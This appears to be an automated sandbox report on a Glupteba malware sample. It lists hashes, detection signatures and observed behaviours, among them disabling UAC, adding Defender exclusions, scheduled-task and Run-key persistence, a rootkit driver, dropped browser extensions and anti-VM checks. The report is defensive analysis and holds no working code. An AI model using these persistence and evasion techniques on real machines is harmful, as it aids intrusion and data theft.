Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
04/02/2024, 07:53
Static task
static1
Behavioral task
behavioral1
Sample
3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe
Resource
win7-20231215-en
General
-
Target
3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe
-
Size
8.2MB
-
MD5
7f3d40886fe5e5a11e355109d1023770
-
SHA1
15db679a34a7ddfcdf49b714eb1e79aae5ab874f
-
SHA256
3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5
-
SHA512
bf498aefc593d7b9e65005070d7969cd96e67676015f8eb438704e171e8cf648757ee29d8ad243f71c759ac4e739a2097a1b1e139043fa26c21ccef93ade327a
-
SSDEEP
49152:qTMwdugBpEerMDMnLzZynH3p9Pz4mRwtjLyhN+4O+HS3oBY8WheKQXBna8CuKQ3R:q+e4+/ZynH3p543tjOT+4pdTCRiR
Malware Config
Signatures
-
Glupteba payload 7 IoCs
resource yara_rule behavioral2/memory/4552-85-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/4552-83-0x0000000002E40000-0x000000000372B000-memory.dmp family_glupteba behavioral2/memory/4952-105-0x0000000002F00000-0x00000000037EB000-memory.dmp family_glupteba behavioral2/memory/4552-188-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/4952-106-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/1960-796-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/1960-805-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe = "0" 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe -
Blocklisted process makes network request 26 IoCs
flow pid Process 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 131 3940 schtasks.exe 137 3940 schtasks.exe 52 3940 schtasks.exe 53 3940 schtasks.exe 55 3940 schtasks.exe 87 968 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4772 netsh.exe 4248 netsh.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation SpBYaRE.exe -
Drops startup file 7 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KqwlVHnPmFRHHtgKlYGx556s.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iXpG4pfRU6G1vryl96xWxz5a.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mtx2JF0EepCnpQrcP8JiuQfw.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ewg2TFsIloIma83MBvgvTeW3.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4Q1PoqVnHdQRkTJN5qn93E5D.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\U4rrZDdD1oWRHVhEjasDSuiy.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BasfCDqrHNGIfOCz2r89Szk6.bat CasPol.exe -
Executes dropped EXE 24 IoCs
pid Process 4552 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 4952 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 1896 bZqLb8FuXLk6j9hSMqddSMxk.exe 1760 bZqLb8FuXLk6j9hSMqddSMxk.exe 2724 aVU6bd6xD7Lia80sIyAQMJAY.exe 4368 WerFault.exe 3996 bZqLb8FuXLk6j9hSMqddSMxk.exe 4416 bZqLb8FuXLk6j9hSMqddSMxk.exe 1092 TzWEsjzZHXRT2qZRVwsfHlsJ.exe 3184 ZEg1uS8vn7QD2IVsRMo1jWM1.exe 316 A1HsF0110Frlw0UEi4q0k6Xb.exe 5012 tLvV5rbdoB7aj6jWYBj2thyy.exe 3656 Install.exe 4368 WerFault.exe 4296 Install.exe 1960 csrss.exe 816 Assistant_106.0.4998.16_Setup.exe_sfx.exe 4804 assistant_installer.exe 4396 assistant_installer.exe 3928 injector.exe 1548 windefender.exe 2896 windefender.exe 4756 HOZCbqC.exe 1468 SpBYaRE.exe -
Loads dropped DLL 10 IoCs
pid Process 1896 bZqLb8FuXLk6j9hSMqddSMxk.exe 1760 bZqLb8FuXLk6j9hSMqddSMxk.exe 4368 WerFault.exe 3996 bZqLb8FuXLk6j9hSMqddSMxk.exe 4416 bZqLb8FuXLk6j9hSMqddSMxk.exe 4804 assistant_installer.exe 4804 assistant_installer.exe 4396 assistant_installer.exe 4396 assistant_installer.exe 968 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0006000000023203-131.dat upx behavioral2/memory/4368-181-0x0000000000A90000-0x0000000000F78000-memory.dmp upx behavioral2/files/0x0006000000023203-183.dat upx behavioral2/files/0x0006000000023215-174.dat upx behavioral2/files/0x0006000000023203-170.dat upx behavioral2/memory/3996-189-0x00000000004E0000-0x00000000009C8000-memory.dmp upx behavioral2/files/0x0006000000023203-190.dat upx behavioral2/memory/1760-163-0x00000000004E0000-0x00000000009C8000-memory.dmp upx behavioral2/memory/1896-152-0x00000000004E0000-0x00000000009C8000-memory.dmp upx behavioral2/files/0x0006000000023203-151.dat upx behavioral2/files/0x0006000000023203-144.dat upx behavioral2/files/0x0008000000023255-722.dat upx behavioral2/files/0x0008000000023255-724.dat upx behavioral2/memory/1548-725-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral2/files/0x0008000000023255-721.dat upx behavioral2/memory/2896-734-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral2/memory/2896-801-0x0000000000400000-0x00000000008DF000-memory.dmp upx -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe = "0" 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" TzWEsjzZHXRT2qZRVwsfHlsJ.exe Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" ZEg1uS8vn7QD2IVsRMo1jWM1.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast Install.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe -
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json SpBYaRE.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json SpBYaRE.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini SpBYaRE.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: bZqLb8FuXLk6j9hSMqddSMxk.exe File opened (read-only) \??\F: bZqLb8FuXLk6j9hSMqddSMxk.exe File opened (read-only) \??\D: bZqLb8FuXLk6j9hSMqddSMxk.exe File opened (read-only) \??\F: bZqLb8FuXLk6j9hSMqddSMxk.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 16 pastebin.com 17 pastebin.com -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 38 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_8CFD0F060456F65ABC9E95E41A1F781C SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA SpBYaRE.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft SpBYaRE.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_D50E9269859FFB5A738F673D82E63752 SpBYaRE.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini HOZCbqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content SpBYaRE.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D4579ED561AFE0AD26F688A8C9A41CC6 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive reg.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol HOZCbqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_5715DE550AA680C2FBA40D3A4F6608E9 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive reg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive schtasks.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_8CFD0F060456F65ABC9E95E41A1F781C SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_5715DE550AA680C2FBA40D3A4F6608E9 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive WerFault.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D4579ED561AFE0AD26F688A8C9A41CC6 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_D50E9269859FFB5A738F673D82E63752 SpBYaRE.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2132 set thread context of 3724 2132 3fe2d1159ccf7ea1e268d05b20500e51dcde40d10475b0a07cd8ee00fe5776a5.exe 94 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN TzWEsjzZHXRT2qZRVwsfHlsJ.exe File opened (read-only) \??\VBoxMiniRdrDN ZEg1uS8vn7QD2IVsRMo1jWM1.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi SpBYaRE.exe File created C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\SAhwXqg.dll SpBYaRE.exe File created C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\zPVnVcj.xml SpBYaRE.exe File created C:\Program Files (x86)\KCGdmeQdU\sSgfNI.dll SpBYaRE.exe File created C:\Program Files (x86)\FohpjzYDshfCC\XjeZbss.dll SpBYaRE.exe File created C:\Program Files (x86)\hgFvgKbJayUn\yMuFvut.dll SpBYaRE.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi SpBYaRE.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja SpBYaRE.exe File created C:\Program Files (x86)\KCGdmeQdU\REqQZzF.xml SpBYaRE.exe File created C:\Program Files (x86)\IoHaAJhEDYhU2\NIenyUo.xml SpBYaRE.exe File created C:\Program Files (x86)\FohpjzYDshfCC\XConuIM.xml SpBYaRE.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak SpBYaRE.exe File created C:\Program Files (x86)\IoHaAJhEDYhU2\MsRSsgjfVNpIJ.dll SpBYaRE.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak SpBYaRE.exe -
Drops file in Windows directory 13 IoCs
description ioc Process File created C:\Windows\rss\csrss.exe ZEg1uS8vn7QD2IVsRMo1jWM1.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\EtrQGzrpWMpnyWxNE.job schtasks.exe File opened for modification C:\Windows\rss TzWEsjzZHXRT2qZRVwsfHlsJ.exe File created C:\Windows\rss\csrss.exe TzWEsjzZHXRT2qZRVwsfHlsJ.exe File created C:\Windows\Tasks\YsLxjqvMZrWymyIEG.job schtasks.exe File created C:\Windows\unins000.dat WerFault.exe File opened for modification C:\Windows\unins000.dat WerFault.exe File created C:\Windows\Tasks\bwKBwqZYjkqxftWshF.job schtasks.exe File created C:\Windows\is-90S0T.tmp WerFault.exe File opened for modification C:\Windows\rss ZEg1uS8vn7QD2IVsRMo1jWM1.exe File created C:\Windows\Tasks\SMPpzaSdDqsJvHF.job cmd.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3276 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
pid pid_target Process procid_target 2224 4552 WerFault.exe 96 1100 4552 WerFault.exe 96 2448 4952 WerFault.exe 99 4392 4552 WerFault.exe 96 992 4952 WerFault.exe 99 4596 4552 WerFault.exe 96 3276 4552 WerFault.exe 96 3556 4952 WerFault.exe 99 316 4952 WerFault.exe 99 412 4552 WerFault.exe 96 860 4952 WerFault.exe 99 5056 4952 WerFault.exe 99 4328 4552 WerFault.exe 96 212 4952 WerFault.exe 99 4772 4552 WerFault.exe 96 5092 4952 WerFault.exe 99 4700 4552 WerFault.exe 96 3572 4552 WerFault.exe 96 3256 4952 WerFault.exe 99 4936 4552 WerFault.exe 96 1204 4952 WerFault.exe 99 3192 4552 WerFault.exe 96 668 4952 WerFault.exe 99 5020 4552 WerFault.exe 96 4960 4952 WerFault.exe 99 4284 4952 WerFault.exe 99 5060 4952 WerFault.exe 99 208 4552 WerFault.exe 96 2088 4952 WerFault.exe 99 220 4552 WerFault.exe 96 3344 4552 WerFault.exe 96 2796 4552 WerFault.exe 96 1800 4952 WerFault.exe 99 1092 4952 WerFault.exe 99 2184 4552 WerFault.exe 96 4272 4552 WerFault.exe 96 3156 1092 WerFault.exe 185 1204 3184 WerFault.exe 184 4368 1092 WerFault.exe 185 2712 3184 WerFault.exe 184 4820 1092 WerFault.exe 185 1804 3184 WerFault.exe 184 3712 3184 WerFault.exe 184 5056 1092 WerFault.exe 185 1468 3184 WerFault.exe 184 3792 1092 WerFault.exe 185 5012 3184 WerFault.exe 184 1836 1092 WerFault.exe 185 3692 1092 WerFault.exe 185 3076 3184 WerFault.exe 184 2128 1092 WerFault.exe 185 920 3184 WerFault.exe 184 3328 1092 WerFault.exe 185 1908 3184 WerFault.exe 184 4936 3184 WerFault.exe 184 1376 1960 WerFault.exe 263 3900 1960 WerFault.exe 263 2604 1960 WerFault.exe 263 3572 3184 WerFault.exe 184 2036 1960 WerFault.exe 263 2896 1960 WerFault.exe 263 3620 1960 WerFault.exe 263 2604 1960 WerFault.exe 263 1468 3184 WerFault.exe 184 -
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1376 schtasks.exe 2912 schtasks.exe 3940 schtasks.exe 2132 schtasks.exe 1072 schtasks.exe 2124 schtasks.exe 2032 schtasks.exe 772 schtasks.exe 4936 schtasks.exe 2960 schtasks.exe 5088 schtasks.exe 3860 schtasks.exe 2792 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-105 = "Central Brazilian Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1822 = "Russia TZ 1 Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" TzWEsjzZHXRT2qZRVwsfHlsJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs schtasks.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" ZEg1uS8vn7QD2IVsRMo1jWM1.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" TzWEsjzZHXRT2qZRVwsfHlsJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1502 = "Turkey Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" TzWEsjzZHXRT2qZRVwsfHlsJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" ZEg1uS8vn7QD2IVsRMo1jWM1.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WerFault.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" ZEg1uS8vn7QD2IVsRMo1jWM1.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2431 = "Cuba Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-3141 = "South Sudan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" TzWEsjzZHXRT2qZRVwsfHlsJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed schtasks.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" 